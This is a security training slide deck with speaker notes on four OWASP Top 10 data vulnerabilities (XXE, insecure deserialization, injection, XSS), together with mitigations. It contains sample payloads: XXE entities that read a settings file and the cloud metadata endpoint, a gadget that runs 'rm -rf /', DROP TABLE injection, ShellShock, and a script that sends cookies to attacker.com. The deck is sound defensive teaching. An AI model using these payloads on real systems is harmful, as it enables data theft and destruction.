% OWASP Top 10 - Data Vulnerabilities
% Javier Eduardo Rojas Romero
% January, 2021

# OWASP Top 10 - Data Vulnerabilities

## OWASP

::: notes

:::

**O**pen **W**eb **A**pplication **S**ecurity **P**roject (OWASP)

Publications
: **OWASP Top 10**, Mobile Security Testing Guide, Software Assurance Maturity Model, ...

Tools
: Zed Attack Proxy, Dependency Check, ...

::: notes

Hello,

As possibly several of you know, the OWASP Top 10 is a list of the most frequent
vulnerabilities that are found in web applications nowadays.

It's worth mentioning who's the OWASP: The Open Web Application Security Project is a non-profit
foundation, which exists since 2001.

They maintain several security-related resources, among publications and
software packages; the most recognized of those is the OWASP Top 10, but there
are also others, like the Mobile Security Testing Guide, proxies for traffic
analysis, etc.

:::

## OWASP Top 10

![](top10cats.png)

::: notes

This is the current Top-10; I've grouped them in operations-related, which is
the group on the right: issues that arise when operating an application, like using
old library versions, or not configuring your services in a secure way. This
mostly concerns devops.

The other group, at the bottom, is about bad practices when implementing authentication and
authorization in a web application.

And the final group, which will be the focus of this talk, is about
vulnerabilities related to processing user data, which I prefer to call untrusted data, or hostile data.

:::

# XML External Entities (XXE)

## XXE

::: notes

An XML External Entity attack takes advantage of an XML feature called Document
Type Definitions; I'm not an XML expert, so apologies for any mistakes in what
I'll say next, but, basically, these DTDs allow you to specify **inside a
document** what kind of tags can appear in the document, inside which tags, how
many of them, etc., to sort of extend the concept of what is a valid XML
document.

And, while they can be useful, they should only be used with trusted data.

This first example is known as the Billion Laughs Attack; in it,
the attacker defines a piece of text (the lol here), and then defines another
piece of text by saying "repeat that first piece of text X times", and then
another one that repeats the second piece of text several times, and so on and
so forth.

When trying to parse this text, the parser first has to resolve those
definitions, and when doing that, it will have to use lots of memory and CPU, so
this becomes a Denial of Service attack.

It's worth mentioning that this kind of thing can also happen with YAML, and in
general you also have to be very paranoid when processing YAML files.

Now if the parsed XML is somehow shown back to whoever sent it ---for
example, to report an error validating the received xml--- more attacks are possible.

This other example abuses the fact that one can put those definitions not only inline, but in external files.
Now, if we assume that the attacker can guess the location of
important files (and there are several system files with well-known locations),
he can trick the xml parser into loading those files and getting their contents
back.

Another possibility is loading those definitions from a URL, and with this an
attacker can do things like leaking information as shown here, explore your
internal network, or even escalate and make requests while impersonating the
server that he attacked.

:::

. . .

<pre><code class="xml" data-line-numbers>&lt;?xml version=&quot;1.0&quot;?&gt;
&lt;!DOCTYPE lolz [
 &lt;!ENTITY lol &quot;lol&quot;&gt;
 &lt;!ELEMENT lolz (#PCDATA)&gt;
 &lt;!ENTITY lol1 &quot;&amp;lol;&amp;lol;&amp;lol;&quot;&gt;
 &lt;!ENTITY lol2 &quot;&amp;lol1;&amp;lol1;&amp;lol1;&quot;&gt;
 &lt;!ENTITY lol3 &quot;&amp;lol2;&amp;lol2;&amp;lol2;&quot;&gt;
]&gt;
&lt;lolz&gt;&amp;lol3;&lt;/lolz&gt;
</code></pre>

. . .

<pre><code class="xml" data-line-numbers="4">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
&lt;!DOCTYPE foo [
&lt;!ELEMENT foo ANY &gt;
&lt;!ENTITY xxe SYSTEM &quot;file:///srv/webapp/conf/settings.py&quot; &gt;]&gt;
&lt;foo&gt;&amp;xxe;&lt;/foo&gt;
</code></pre>

. . .

<pre><code class="xml" data-line-numbers="4">&lt;?xml version=&quot;1.0&quot; encoding=&quot;ISO-8859-1&quot;?&gt;
&lt;!DOCTYPE foo [
&lt;!ELEMENT foo ANY &gt;
&lt;!ENTITY xxe SYSTEM &quot;http://169.254.169.254/latest/meta-data/&quot; &gt;]&gt;
&lt;foo&gt;&amp;xxe;&lt;/foo&gt;
</code></pre>


## XXE - Vectors

::: notes

When should you be concerned about this kind of attack? Whenever you receive an
XML document, and try to parse it, and in particular, when you try to
**validate** it.

Now, when do we put ourselves in a situation where we have to parse XML
documents?

When we build a SOAP API.

Or when our application uses SAML.

Or when we open XML-based documents, like excel spreadsheets, or GPS traces.

Or when we process vector graphics with SVG.

:::

* SOAP
* SAML (SSO)
* XML-based documents (.docx, .odt, .gpx)
* SVG
* ...

## XXE - Mitigations

::: notes

So, what can you do if you have to handle XML files?

A first approach is: don't solve the problem, and use a data format different
from XML, that is simpler to parse.

But if you have to, nowadays parsers have options to disable DTD handling, so
you can try that.

Also, and while it's not a 100% safe solution, you can put a Web Application
Firewall in place, which should help you stop the most common attacks.

:::


  * DO NOT XML
  * Configure your parser properly
    * Disable DTDs
  * WAFs\*

# Insecure Deserialization
## Insecure Deserialization

::: notes

Now, insecure deserialization. Serialization is used when some application wants
to save an instance of a class, perhaps send it to someone else, and get it back
later, for example in an event-driven architecture, or to store the session data
of a user.

This shows a simplified example of how a serialized object looks like, in this
case using JSON: you put there the class name of the object, its attributes, and
the values of each attribute.

Or as you can see in this other example, you can of course have an attribute
that is another object instance.

Now, this is fine, and can be useful, but the problem is that when processing a
serialized object, we are letting the attacker manipulate what objects we should
create, because he has control of the class names, and it's possible for him to
put together a set of instances that abuse the deserialization mechanism to
execute whatever code he wants, when the data is deserialized.

In this example, a couple of classes are connected so that, when
deserialized, they execute a command under control of the attacker.

:::

<pre><code class="json" data-line-numbers="">{
  "class": "com.endava.models.Transaction",
  "attributes": {
    "amount": "50.3",
    "originAccount": "29",
    "destinationAccount": "10",
    }
  }
}
</code></pre>

. . .

<pre><code class="json" data-line-numbers="|2,5">{
  "class": "com.endava.utils.CacheManager",
  "attributes": {
    "initHook": {
      "class": "com.endava.utils.CommandTask",
      "attributes": {
        "command": "rm -rf /"
      }
    }
  }
}
</code></pre>
## Insecure Deserialization

::: notes

The attacker here found a class that lets him define a command in an attribute,
and run that command as part of a method call, ...

and then he found another class, that has an attribute with the type he needs, ...

and that also runs the method he wants on that attribute, as part of the deserialization protocol.

Now, this code is just an example, and you are possibly asking yourself how does
the attacker know about these classes, but the thing with these attacks is that they can use any
class that is available to your application; that is not only the classes you
wrote, but those of the framework you use, and all of those in your classpath.

So most of these attacks just make the assumption that you are using a popular
library, like apache commons, and build a chain of classes from classes there;
that's what's called a gadget.

:::


<pre><code class="java" data-line-numbers="9,10,12|1,2|3,5,11">public class CacheManager implements Serializable {
    private final Runnable initHook;
    public void defaultReadObject (ObjectInputStream ois) {
        ois.defaultReadObject();
        initHook.run();
    }
}

public class CommandTask implements Runnable, Serializable {
    private final String command;
    public void run() {
        Runtime.getRuntime.exec(command);
    }
}</code></pre>

## Insecure Deserialization - Impact

::: notes

While these vulnerabilities are not that easy to automate, they have a
tremendous impact; at the very least, you are exposed to denial of service, and
it's basically downhill from there: you can get data corruption,
privilege escalation, and even remote code execution.

:::


* Denial Of Service
* Application state manipulation
* Remote Code Execution

## Insecure Deserialization - Vectors

::: notes

So, when should you be concerned? serialization is used in several scenarios,
like remote procedure calls, for sending messages between microservices, or for
passing messages through queues, or streams.

Sometimes you also see it being used when caching data, where the developer
serializes and stores the object he wants to cache, there.

Another rather common use is to store the session data for a user, in a cookie
in a web application.

The example I showed used java, where it's a fairly common issue, but this kind
of problem can appear in libraries for many languages.

:::

::::::: {.columns}

::: {.column width="50%"}

* RPC/IPC
  * Message brokers, web services, etc.
* Caches, storage
* Tokens, user sessions

:::

::: {.column width="50%"}

* Java
* .NET
* Python
* PHP
* ...

:::

:::::::

## Insecure Deserialization - Vectors

::: notes

Keep in mind that people also refer to serialization using other terms, like
pickling, marshalling, or freezing.

And also, keep in mind that it doesn't really matter what format is used for
serializing, yaml, json, or specific binary format; none of them is safer than
the others as long as they instantiate arbitrary classes, that's the source of
the vulnerability.

:::


::::::: {.columns}

::: {.column width="50%"}

* Pickle
* Marshalling
* Serializing
* Freezing

:::

::: {.column width="50%"}

* XML
* YAML
* JSON
* ...

:::

:::::::

## Insecure Deserialization - Mitigations

::: notes

how can you avoid these problems, if you have to process serialized objects that
you don't fully trust?

as usual, the easiest way is to not have the problem. Don't use serialization,
if you can help it

now, if you have to, there are some alternatives: the first one is, just use
something simpler, like plain JSON, and re-create your objects manually;
that way you are in control of what objects you create, using what classes, etc.

or, perhaps, sign the objects when you serialize them, and check the signature
before deserializing them; this way you can make sure that nobody has modified
the object. This sounds easy but it's usually hard to do, unless
your framework helps you.

the other alternative is to search for a deserialization library written with
these issues in mind, and checking really carefully their documentation.

Now, those two mitigations have a little star because they are not foolproof, or
because they are quite complicated to use properly. If you can, avoid them, and
settle for a simpler alternative.

That's about it regarding deserialization

:::


* Don't
* Just Don't
* ...
* Use a simpler mechanism
* Sign it\*
* Use a secure deserialization library\*

# Injection
## Injection

::: notes

Now, let's talk about injection; an injection attack happens when we use data
from our users as part of commands for other systems, and we don't restrict what
kinds of data we will allow from our users, as part of that command

The typical example is SQL injection; here we see a piece of code that builds
the string for a query and puts the user data into it. When used with safe data,
it would generate a proper SQL query

but, since we are not making sure that the data is restricted to integers, in
this case, the attacker can extend the data, to achieve, for example

privilege escalation

or manipulating data

:::

<pre><code class="java">Query HQLQuery = session.createQuery(
    "FROM accounts WHERE custID="
    + request.getParameter("id"));
</code></pre>

::::::: {.columns}

::: {.column width="50%"}

<div class="fragment" data-fragment-index="1">
<pre><code class="plaintext" data-trim>
id=48
</code></pre>
</div>

:::

::: {.column width="50%"}


<div class="fragment" data-fragment-index="1">
<pre><code class="sql">SELECT *
FROM accounts
WHERE custID=48
</code></pre>
</div>

:::

:::::::

::::::: {.columns}

::: {.column width="50%"}


<div class="fragment" data-fragment-index="2">
<pre><code class="plaintext" data-trim>
id=999%20OR%20custID%3D1
</code></pre>
</div>

:::

::: {.column width="50%"}

<div class="fragment" data-fragment-index="2">
<pre><code class="sql">SELECT *
FROM accounts
WHERE custID=999 OR custID=1
</code></pre>
</div>

:::

:::::::

::::::: {.columns}

::: {.column width="50%"}

<div class="fragment" data-fragment-index="3">
<pre><code class="plaintext" data-trim>
id=48%3B%20DROP%20TABLE%20accounts
</code></pre>
</div>

:::

::: {.column width="50%"}

<div class="fragment" data-fragment-index="3">
<pre><code class="sql">SELECT *
FROM accounts
WHERE custID=48; DROP TABLE accounts
</code></pre>
</div>

:::

:::::::

## Injection - Vectors

::: notes

now, this vulnerability is called injection, and not only SQL injection, because
injection can happen in many contexts; for example, in environment variables or
commands to be run in a shell, or even in contexts like regular expressions,
where it could cause a denial of service, or even in things like Active
Directory, where you expose yourself to tampering with the directory, or to
information leaks.

It's also worth mentioning the `eval()` functionality; it's a function that
takes a string, and executes it as real code; it is convenient, but you should
never use it with untrusted data. I mention it because it's not unusual to see
people parsing a JSON string in Javascript with it.

:::

* shell commands/environment variables
* Regexps
* LDAP/Active Directory
* `eval` (Ruby, Python, **JavaScript**, ...)

## Injection - not only SQL

::: notes

as an example, in 2014 it was found that it was possible to trick bash, the most
usual system shell in UNIX systems, to execute arbitrary code, just by passing
an environment variable to it

this was a really bad problem, because there were (and there are) many
applications exposed to the Internet where we do this sort of thing

The example on the left shows how an attacker could use a URL argument perform
an attack, using the fact that those arguments are converted into environment
variables in certain kinds of web applications

This forced updating all the Linux distributions, Macs, everything.

:::

ShellShock, 2014:

::::::: {.columns}

::: {.column width="50%"}

<pre><code class="sh">x='() { :;}; echo vulnerable'</code></pre>

:::

::: {.column width="50%"}

<pre><code class="plaintext">https://website.com?x=%27%28%29%20%7B%20%3A%3B%7D%3B%20echo%20vulnerable%27</code></pre>

:::

:::::::

Impact: Linux, OS X, \*BSD

## Injection - Mitigations

::: notes

again, what can be done about injection?

When it comes to SQL injection, using an ORM like JPA or hibernate will protect
you, but keep in mind that even with those libraries it's possible to create an
injection vulnerability, when you create your queries by hand, without
parameterizing them.

the best defense is to escape your data; as I said, the ORM usually handles this
for you. Keep in mind that you must escape depending on context; the rules for
escaping SQL are different from the rules for escaping a shell command; you
can't just escape the data, then store it, then trust it and use it in different
contexts.

Another measure you can put in place is, again, to use a web application
firewall, but once again remember it won't cover you completely, but only
against automated attacks, which are not that sophisticated.

:::


* Use your ORM carefully
* Escape your data **according to context** before use
* WAFs\*

# Cross Site Scripting (XSS)

## Previous attacks

::: notes

in the previous vulnerabilities, the target was always the server: the goal was
to take data out from it, or to gain control of that server

:::


![](attack-on-server.png){ width=100% }

## XSS

::: notes

but, in a cross site scripting attack, it's the user who is the target, and the
server is merely an involuntary collaborator on the attack.

in previous attacks, the attacker abuses the trust the system gives to its
users, but in cross site scripting attacks the attacker abuses the trust the
users give to the system; in this case, as a user, I'm not expecting that the
website of my bank will attack me, but that's exactly what happens here.

:::


![](attack-on-user.png)

## XSS

::: notes

so, how does this work?

Let's assume that we have an ecommerce website, where you can buy things, and
you can also write reviews of the things you purchased; the code we see here is
generating part of the page for a product, the section that shows the reviews:
it takes the reviews of all the users, and puts those texts into the page.

However, since this code doesn't escape HTML, but instead trusts what it read
from the database, an attacker could write a comment like this, which injects a
bit of code that steals the session from the user: when the browser reads this
HTML, it will ran that javascript to read all the cookies, including the one for
the session, and then submit that to a website he controls.

And this happens not only with HTML; here we can see a different attack, that
takes advantage of the fact that you can put javascript code in a link

:::


<pre><code class="java" data-trim>
(String) userReviews += &quot;&lt;p class=&apos;userReview&apos;&gt;&quot; 
   + product.userReviews[i] 
   + &quot;&lt;/p&gt;&quot;;
</code></pre>

. . .

<pre><code data-trim class="plaintext">
This sucks!&lt;/p&gt;
&lt;script&gt;document.location=&apos;http://www.attacker.com/cgi-bin/cookie.cgi?foo=&apos;+document.cookie&lt;/script&gt;
&lt;p&gt;
</code></pre>

. . .

<pre><code data-trim class="html">
&lt;p class=&apos;userReview&apos;&gt;This sucks!&lt;/p&gt;
&lt;script&gt;document.location=&apos;http://www.attacker.com/cgi-bin/cookie.cgi?foo=&apos;+document.cookie&lt;/script&gt;
&lt;p&gt;&lt;/p&gt;
</code></pre>


## XSS - Vectors

::: notes

where are you vulnerable to cross site scripting? whenever you use any user data
to generate ANY part of an HTML page: not only the body, but also tag names,
or any property, like classes

Also, when generating URLs, or even CSS; you can get an attack from any of those
places.

And of course, when generating Javascript, or even JSON.

This is a problem whenever you generate any of those kinds of files, either by
hand, or even when using a template engine, like for example thymeleaf in java,
or the django template engine, in python.

And, this is not only a problem for backend developers; you also have to keep
this in mind as a frontend developer; in any framework, like react, vue, or
others, it's possible to expose yourself to a cross site scripting attack. The
frameworks do protect you from lots of common mistakes, but not all of them, and
you still have to watch out.

An additional vector is files uploaded from the user: although it's unusual,
images have been used to inject javascript into websites

:::


::::::: {.columns}

::: {.column width="50%"}

* HTML
  * Body
  * Tag names
  * Prop. names/values
* URLs
* CSS
* Javascript
* JSON
* Attachments/Uploads

:::

::: {.column width="50%"}

![](xss-vectors.png)

:::

:::::::


## XSS - Impact

::: notes

The usual consequence from this kind of attack is javascript execution on the
user's browser.

that usually means that the user session is compromised, and the attacker can
impersonate them, at least in principle, and take over an account; if anything,
that's problematic because it could allow an attacker to steal an account with
admin privileges

another kind of consequence is malware delivery; for example, code that hijacks
your browser and makes it work as a bitcoin miner. And more recently, malware in
ecommerce websites that captures credit card numbers and submits them to the
attacker.

:::


* Code Execution on the user's browser
  * Session hijacking
  * Access to browser Local Storage
  * Malware delivery

## XSS - Mitigations

::: notes

as usual, what to do about this?

first of all, be strict when validating primitive data types, like numbers, or
plain strings.

but, the main thing to consider is: you must escape your data, right before you
use it, according to the context where you want to use it; for example, the
rules for escaping text in the HTML context are different from those for
escaping text in the URL context, and also different from those in the
Javascript context.

an important note: it's better that you search for a library for doing the
escaping, that has been vetted from a security point of view; don't write your
own. The best resource here is the owasp website, they maintain an index of
these tools for several languages.

it's also possible to ask the browser for help; the content-security-policy
header allows you to say things like: all inline javascript is forbidden, or
only javascript coming from the application can be trusted. This helps a lot,
but doesn't excuse you from responsibility 

regarding files uploaded by users, the best approach is to store, and to serve
them, from a different domain than the one used by your application; that way,
even if they manage to sneak javascript in those files and load them in a page
somehow, it won't be able to affect your application, when you use content
security policy.

regarding cookies, and sessions, make sure that your web application configures
cookies as http-only cookies; those are cookies that can't be accessed via
javascript, so that's a good security measure, in addition to escaping/encoding,
etc.

:::


* Escape data right before use, **according to context**
* Use `Content-Security-Policy`
* Host user files in a **separate** domain
* Use `HTTPOnly` cookies

## XSS - Mitigations

::: notes

an additional mitigation is to just use a modern templating framework for
generating html

but, without forgetting that all of these frameworks are not completely immune
to the problem; all of them offer you ways of adding data without escaping it.
That's convenient, and in some cases is necessary to do what you want, but it's
important that you understand that just because you use a framework, it doesn't
mean you are automatically secure; it can be mis-used.

:::

* Use modern templating engines ... **carefully**

<pre><code data-trim class="javascript">
return &lt;h1&gt;Hello, {user_supplied}&lt;/h1&gt;;
</code></pre>

. . .

<pre><code data-trim class="html">
&lt;div dangerouslySetInnerHTML={user_supplied} /&gt;
</code></pre>

# OWASP resources

## OWASP resources


The OWASP Top 10 pages give you:

::: incremental

* Criteria to determine if your application might be exposed (arch./devel POV)
* How susceptible of automation is each attack (devops POV)
* Suggested mitigations (devel POV)
* Attack examples (QA/Sec. POV)
* How to test an application to assess vulnerability (QA/Sec. POV)

:::

## Thanks!

## References - XXE

  * <https://pypi.org/project/defusedxml/>: example documents, along with
    explanations of the different security issues to be aware of when parsing
    XML.

## References - Insecure Deserialization

  * <https://www.slideshare.net/frohoff1/appseccali-2015-marshalling-pickles>: a
    more in-depth presentation of the topic, presenting attacks, and discussing
    mitigations and why they are/are not useful to stop the issue.

## References - Injection

  * <https://pulsesecurity.co.nz/articles/postgres-sqli> : A step-by-step
    discussion of how to take advantage of an improperly configured PostgreSQL
    server and a SQL Injection failure to achieve Remote Code Execution.

## References - XSS

  * <https://pragmaticwebsecurity.com/articles/spasecurity/react-xss-part1.html>:
    A three-part series about what kind of XSS attacks are possible in React
    nowadays (2020), and how to guard against them.
  * <https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html>: XSS prevention, server side.
  * <https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html>: XSS prevention, client side.